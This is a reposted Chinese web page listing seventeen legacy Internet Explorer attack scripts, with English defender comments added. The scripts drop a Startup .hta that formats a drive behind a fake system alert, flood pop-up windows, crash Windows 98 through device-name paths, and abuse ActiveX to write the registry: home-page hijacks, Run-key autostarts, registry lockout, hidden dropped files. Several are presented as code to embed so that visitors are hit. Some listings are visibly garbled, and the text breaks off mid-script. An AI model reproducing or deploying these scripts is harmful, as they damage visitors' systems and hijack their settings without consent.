• 收集十七项网页恶意代码(转)


    1、格式化硬盘
    <!-- Snippet 1 (legacy IE): instantiates a scriptable ActiveX control by CLSID and uses its
         Reset / Path / Doc / write members to drop an .hta file into a Startup folder. The .hta
         body held in scr.Doc creates a second ActiveX object and is written to launch a format
         command and show a decoy "Windows is configuring the system" alert at the next logon.
         Defender notes: an unexpected .hta file in any Startup folder is the artifact to look
         for. The exposure depends on these controls being scriptable from an untrusted page, so
         disabling ActiveX scripting for the Internet zone, or kill-bitting the controls, closes it.
         NOTE(review): the script string is garbled in this transcription and is not valid as
         shown; the script element is also never closed in the listing. -->
    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
    </object>
    <script>
    scr.Reset();
    scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";
    scr.Doc="<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object><script>wsh.Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.);</"+"SCRIPT>";
    scr.write();
    2、使 WINDOWS 98掉线的代码
    <!-- Snippet 2, part 1: lure page. A single link leads to wincrash.htm, which is presumably
         the page holding the markup listed next (TODO confirm; that file is not shown here).
         The handler attribute on the link is garbled as transcribed. Nothing on this page
         touches the system by itself. -->
    <html>
    <head>
    </head>
    <a href="wincrash.htm" on mouseclick="alert("Go To Hell,Mall!")">HaHa!</a>
    </html>
    <!-- Snippet 2, part 2: an image whose SRC is a local path built from a reserved DOS device
         name repeated twice. The heading attributes a crash of Windows 98 to resolving such a
         path; the two comments below list other device names used the same way.
         Defender notes: nothing persists after a reboot, and the fix was the vendor patch for
         device-name path handling on Windows 95/98 (presumably; confirm against the vendor
         bulletin). Content filters can flag local device-name paths in SRC or HREF attributes
         of pages served from the Internet zone. -->
    <HTML>
    <BODY>
    <IMG SRC="c:\con\con">
    <!-- or nul\nul, clock$\clock$ -->
    <!-- or aux\aux, config$\config$ -->
    </BODY>
    </HTML>

    3、 视窗炸弹
    <!-- Snippet 3: pop-up flood. The onload handler calls WindowBomb, which opens 1x1 windows
         in a loop with no exit condition; iCounter makes every window name unique, so no
         existing window is reused. The effect is resource exhaustion in the browser session
         only; nothing is written to disk or registry.
         Defender notes: pop-up blocking defeats it, since current browsers refuse window.open
         calls that are not tied to a user gesture. Recovery is ending the browser process. -->
    <HTML>
    <HEAD>
    <TITLE>f\*\*k USA</TITLE>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    </HEAD>
    <BODY onload="WindowBomb()">
    <SCRIPT LANGUAGE="java script">
    function WindowBomb()
    {
    var iCounter = 0 // dummy counter
    while (true)
    {
    window.open("http://i50.126.com/","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    iCounter++
    }
    }
    </script>
    </BODY>
    </HTML>

    4、造成IE 5.0崩溃的代码
    <!-- Snippet 4: script hang. The for loop can never finish because x is set back to 0
         whenever it reaches 2, so the page keeps assigning document.bgColor without yielding.
         Only color[1] and color[2] are filled in; color[0] is left undefined. The heading
         attributes a crash of IE 5.0 to this loop.
         Defender notes: nothing persists; the effect ends with the browser process. Current
         browsers isolate the page and offer to stop an unresponsive script. -->
    <HTML>
    <BODY>
    <script>
    var color = new Array;
    color[1] = "black";
    color[2] = "white";
    for(x = 0; x <3; x++)
    {
    document.bgColor = color[x]
    if(x == 2)
    {
    x = 0;
    }
    }
    </SCRIPT>
    </BODY>
    </HTML>

    5、进入 WINDOWS 之前弹出对话框的代码。修复方法:到注册表找到 LegalNoticeCaption、LegalNoticeText 并删除
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 5 (legacy IE with the Microsoft Java VM): written to set the logon-notice caption
    // and text, so that a dialog appears before Windows starts.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifacts are the four Winlogon values written below, and the page's
    // stated fix is to delete LegalNoticeCaption and LegalNoticeText. Page source that combines
    // this applet class with setCLSID is a usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO and Net are obtained here but never used in this listing.
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    // The "Chg" cookie acts as a marker: the writes are skipped when it is already present.
    if (documents .cookie.indexOf("Chg") == -1)
    {
    // Same caption and text written under both HKCU and HKLM.
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏 网络联盟 i50.126.com");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏 网络联盟 i50.126.com");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章 i50.yjpc.com");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章 i50.yjpc.com");
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    6、造成 WINDOWS98 不能关机的代码。 到注册表找到 FastReboot 删除就OK
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 6 (legacy IE with the Microsoft Java VM): written to set the FastReboot value
    // under Control\Shutdown, which the heading says leaves Windows 98 unable to shut down.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifact is the FastReboot value written below, and the page's stated
    // fix is to delete it. Page source that combines this applet class with setCLSID is a usable
    // detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO and Net are obtained here but never used in this listing.
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    // The "Chg" cookie acts as a marker: the writes are skipped when it is already present.
    if (documents .cookie.indexOf("Chg") == -1)
    {
    // FastReboot is written as "1" under both the HKLM and HKCU paths given here.
    Shl.RegWrite ("HKLM\\System\\CurrentControlSet\\Control\\Shutdown\\FastReboot", "1");
    Shl.RegWrite ("HKCU\\System\\CurrentControlSet\\Control\\Shutdown\\FastReboot", "1");
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    7、视窗炸弹代码

    <!-- Snippet 7: pop-up flood, the same listing as snippet 3. The onload handler calls
         WindowBomb, which opens 1x1 windows in a loop with no exit condition; iCounter makes
         every window name unique, so no existing window is reused. The effect is resource
         exhaustion in the browser session only; nothing is written to disk or registry.
         Defender notes: pop-up blocking defeats it, since current browsers refuse window.open
         calls that are not tied to a user gesture. Recovery is ending the browser process. -->
    <HTML>
    <HEAD>
    <TITLE>f\*\*k USA</TITLE>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    </HEAD>
    <BODY onload="WindowBomb()">
    <SCRIPT LANGUAGE="java script">
    function WindowBomb()
    {
    var iCounter = 0 // dummy counter
    while (true)
    {
    window.open("http://i50.126.com/","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    iCounter++
    }
    }
    </script>
    </BODY>
    </HTML>

    8、让IE不断循环的代码

    <!-- Snippet 8: listed as making IE loop without end; the markup is the same pop-up flood
         shown elsewhere on this page apart from the casing of the META line. The onload
         handler calls WindowBomb, which opens 1x1 windows in a loop with no exit condition,
         each under a unique window name. Nothing is written to disk or registry.
         Defender notes: pop-up blocking defeats it, since current browsers refuse window.open
         calls that are not tied to a user gesture. Recovery is ending the browser process. -->
    <HTML>
    <HEAD>
    <TITLE>f\*\*k USA</TITLE>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=gb2312">
    </HEAD>
    <BODY onload="WindowBomb()">
    <SCRIPT LANGUAGE="java script">
    function WindowBomb()
    {
    var iCounter = 0 // dummy counter
    while (true)
    {
    window.open("http://i50.126.com/","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    iCounter++
    }
    }
    </script>
    </BODY>
    </HTML>

    9、让电脑自动启动程序的代码。修复方法:在注册表中找到值为 http://i50.yjpc.com/ 的相应键值并删除
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 9 (legacy IE with the Microsoft Java VM): written to add an autostart entry by
    // writing a URL under the current user's Run key.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifact is a Run-key value holding http://i50.yjpc.com/, and the
    // page's stated fix is to find and delete it. Run keys are a standard place to audit for
    // persistence. Page source that combines this applet class with setCLSID is a usable
    // detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f(){
    try
    {
    文件://ActiveX/ initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO and Net are obtained here but never used in this listing.
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    // The "Chg" cookie acts as a marker: the write is skipped when it is already present.
    if (documents .cookie.indexOf("Chg") == -1)
    {
    // The key path ends in a backslash, i.e. no value name is given after "Run".
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://i50.yjpc.com/");
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    10、自动设成主页代码
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 10 (legacy IE with the Microsoft Java VM): home-page hijack, written to overwrite
    // the Internet Explorer "Start Page" value.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifact is the Start Page value under Internet Explorer\Main in both
    // HKCU and HKLM; restoring the wanted URL there undoes the change. Page source that combines
    // this applet class with setCLSID is a usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO and Net are obtained here but never used in this listing.
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    // The "Chg" cookie acts as a marker: the writes are skipped when it is already present.
    if (documents .cookie.indexOf("Chg") == -1)
    {
    // Same URL written under both HKCU and HKLM.
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    11、修改IE标题栏目。 修改方法 将以下代码中可以换的换成你想换的
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 11 (legacy IE with the Microsoft Java VM): written to overwrite the Internet
    // Explorer "Window Title" value, which changes the text shown in the browser title bar.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifact is the Window Title value under Internet Explorer\Main in
    // both HKCU and HKLM; an unexpected string there is the sign to check for. Page source that
    // combines this applet class with setCLSID is a usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO and Net are obtained here but never used in this listing.
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    // The "Chg" cookie acts as a marker: the writes are skipped when it is already present.
    if (documents .cookie.indexOf("Chg") == -1)
    {
    // Same title string written under both HKCU and HKLM.
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "————( I50.126.COM )————( 网络联盟黑客安全网络 )————( I50.YJPC.COM)");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "————( I50.126.COM )————( 网络联盟黑客安全网络 )————( I50.YJPC.COM)");
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    12、在右键加进网页链接 。修改方法:到注册表找到 MenuExt 把它删除就OK
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 12 (legacy IE with the Microsoft Java VM): written to add an entry to the IE
    // right-click menu (MenuExt) that points at a local HTML file dropped by the same script.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: two artifacts belong together, the MenuExt subkey written below and the
    // file c:\yntop.htm. The page's stated fix is to delete the MenuExt entry; the dropped file
    // should be removed as well. Page source that combines this applet class with setCLSID is a
    // usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f()
    {
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // sh is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    sh = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // fo is the object used for CreateTextFile / GetFile below (CLSID commonly registered as
    // Scripting.FileSystemObject).
    fo = a1.GetObject();
    // The "km169set" cookie acts as a marker: the block is skipped when it is already present.
    if (documents .cookie.indexOf("km169set") == -1)
    {
    // Menu entry: the subkey's default value names the local file to open.
    sh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\中国网络安全中心\\", "c:\\yntop.htm");
    // "contexts" is written as a DWORD; presumably a bitmask of the click contexts in which the
    // entry is offered (TODO confirm).
    sh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\中国网络安全中心\\contexts", 0xf3,"REG_DWORD");
    // Dropped file: a page whose only content is a script opening the promoted URL.
    hd=fo.CreateTextFile("c:\\yntop.htm");
    hd.write(<html><head></head><\script language=java script>window.open("http://i50.yjpc.com/");<\/script></html>);
    hd.close();
    file=fo.GetFile("c:\\yntop.htm");
    // Attributes 6 = Hidden (2) + System (4) in the FileSystemObject attribute flags, so the
    // file is not listed in a default Explorer view.
    file.Attributes=6;
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Empty catch: any failure is hidden from the visitor.
    catch(e)
    {
    }
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    13、IE 的 INTERNET 选项的主页条失去作用变灰的代码。 修改方法,找到 HomePage 删除就OK
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 13 (legacy IE with the Microsoft Java VM): written to set the IE policy value
    // "HomePage" under Control Panel, which the heading says greys out the home-page box in
    // Internet Options so the user cannot change it back.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifact is the HomePage DWORD under the Policies path written below,
    // and the page's stated fix is to delete it. A policy value under HKCU that no administrator
    // set is worth alerting on. Page source that combines this applet class with setCLSID is a
    // usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f()
    {
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // sh is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    sh = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // fo is the object used for CreateTextFile / GetFile below (CLSID commonly registered as
    // Scripting.FileSystemObject).
    fo = a1.GetObject();
    // The "km169set" cookie acts as a marker: the block is skipped when it is already present.
    if (documents .cookie.indexOf("km169set") == -1)
    {
    sh.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage", 1,"REG_DWORD");
    // The file calls below appear with their arguments missing in this transcription; only the
    // GetFile line still names c:\yntop.htm.
    hd=fo.CreateTextFile();
    hd.write();
    hd.close();
    file=fo.GetFile("c:\\yntop.htm");
    // Attributes 6 = Hidden (2) + System (4) in the FileSystemObject attribute flags.
    file.Attributes=6;
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Empty catch: any failure is hidden from the visitor.
    catch(e)
    {
    }
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    14、回收站给改了名字的修改方法:打开注册表找到 {645FF040-5081-101B-9F08-00AA002F954E} 修改就 OK
    修改回收站的代码
    <SCRIPT language=java script>
    // Snippet 14 (legacy IE with the Microsoft Java VM): written to set the default value of the
    // CLSID key {645FF040-5081-101B-9F08-00AA002F954E}, which the heading identifies as the
    // Recycle Bin name.
    // Technique: the document.write below puts a zero-size com.ms.activeX.ActiveXComponent
    // applet into the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain
    // COM objects that an untrusted page should not be able to reach.
    // Defender notes: the artifact is the default value of that CLSID key under Software\CLASSES
    // in HKCU and HKLM, and the page's stated fix is to edit it back. Page source that combines
    // this applet class with setCLSID is a usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO and Net are obtained here but never used in this listing.
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    // The "Chg" cookie acts as a marker: the writes are skipped when it is already present.
    if (documents .cookie.indexOf("Chg") == -1)
    {
    // The key paths end in a backslash, i.e. the key's default value is the target.
    Shl.RegWrite ("HKCU\\Software\\CLASSES\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", "回收站");
    Shl.RegWrite ("HKLM\\Software\\CLASSES\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", "回收站");
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    15、注册表给锁住了
    锁注册表的代码
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    // Snippet 15 (legacy IE with the Microsoft Java VM): written to set the DisableRegistryTools
    // policy value to 1, which the heading describes as locking the registry.
    // Technique: the line above writes a zero-size com.ms.activeX.ActiveXComponent applet into
    // the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain COM objects
    // that an untrusted page should not be able to reach.
    // Defender notes: the artifact is the DisableRegistryTools DWORD under Policies\System in
    // HKCU. The page gives no fix for this one; recovery means deleting or zeroing that value by
    // a route other than the interactive registry editor (for example a policy editor or an
    // offline edit). The setting matters most as a blocker for cleaning up other registry
    // changes, so it should be reverted first. Page source that combines this applet class with
    // setCLSID is a usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    function f()
    {
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // sh is the object whose RegWrite method is called below (CLSID commonly registered as WScript.Shell).
    sh = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // fo is the object used for CreateTextFile / GetFile below (CLSID commonly registered as
    // Scripting.FileSystemObject).
    fo = a1.GetObject();
    // The "km169set" cookie acts as a marker: the block is skipped when it is already present.
    if (documents .cookie.indexOf("km169set") == -1)
    {
    sh.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 1,"REG_DWORD");
    // The file calls below appear with their arguments missing in this transcription; only the
    // GetFile line still names c:\yntop.htm.
    hd=fo.CreateTextFile();
    hd.write();
    hd.close();
    file=fo.GetFile("c:\\yntop.htm");
    // Attributes 6 = Hidden (2) + System (4) in the FileSystemObject attribute flags.
    file.Attributes=6;
    // The marker cookie is given an expiry one millisecond after the current time.
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    // Empty catch: any failure is hidden from the visitor.
    catch(e)
    {
    }
    }
    function init()
    {
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    16、在收藏夹生成文件的代码
    将以下代码加进网页后,只要别人一打开就可以自动加进收藏夹
    <!-- Snippet 16 (legacy IE with the Microsoft Java VM): single-line script written to create
         a .URL shortcut inside a Favorites folder located through GetSpecialFolder(0), with the
         promoted site as its target. It uses the same zero-size ActiveXComponent applet as the
         other listings on this page, driven through setCLSID, createInstance and GetObject.
         Defender notes: the artifact is an unrequested .URL file in the Favorites folder;
         deleting that file undoes the change. Page source that combines the applet class
         com.ms.activeX.ActiveXComponent with setCLSID is a usable detection string.
         NOTE(review): the line is garbled in transcription (the catch blocks are not closed)
         and is not valid script as shown. -->
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");function yuzi(){try{hzy=document.applets[0];hzy.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");hzy.createInstance();yuzi=hzy.GetObject();hzy.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");hzy.createInstance();try{Shor=yuzi.CreateShortcut(hzy.GetObject().GetSpecialFolder(0)+"\\Favorites"+"\\"+"【★-中国民间黑客组织-★】"+".URL");Shor.TargetPath="http://i50.126.com/";Shor.Save();}catch(yu){]catch(yu){]setTimeout("yuzi()",1000);</SCRIPT>

    17、在桌面生成的网页文件
    以下代码就是在桌面上生成一份网页的文件,一按打开的就是你的网页
    <SCRIPT language=java script>
    // Snippet 17 (legacy IE with the Microsoft Java VM): written to place a .URL shortcut on the
    // desktop and to overwrite the IE "Window Title" value.
    // Technique: the document.write below puts a zero-size com.ms.activeX.ActiveXComponent
    // applet into the page; f() then drives it (setCLSID / createInstance / GetObject) to obtain
    // COM objects that an untrusted page should not be able to reach.
    // Defender notes: the artifacts are a .URL file under C:\WINDOWS\Desktop and the Window Title
    // value under HKCU; removing the file and restoring the value undoes the change. Page source
    // that combines this applet class with setCLSID is a usable detection string.
    // NOTE(review): the listing is garbled in transcription and is not expected to run as shown.
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
    // AddFavLnk: creates "<loc>\<DispName>.URL" pointing at SiteURL and saves it. Relies on the
    // global Shl that f() assigns before calling it.
    function AddFavLnk(loc, DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
    }
    function f(){
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Shl: used for RegWrite and CreateShortcut (CLSID commonly registered as WScript.Shell).
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    // FSO: used for GetSpecialFolder / FolderExists / GetDriveName (CLSID commonly registered as
    // Scripting.FileSystemObject).
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    // Net: read for UserName below (CLSID commonly registered as WScript.Network).
    Net = a1.GetObject();
    try{
    // The cookie check is commented out, so nothing here limits the block to a single run.
    //if (documents .cookie.indexOf("ChgLive") == -1)
    //{
    // "ChgLive" cookie with an expiry 90 days ahead; the same two lines are repeated after the
    // registry write.
    var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
    documents .cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Interine Explorer");
    var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
    documents .cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
    var WF, Shor, loc;
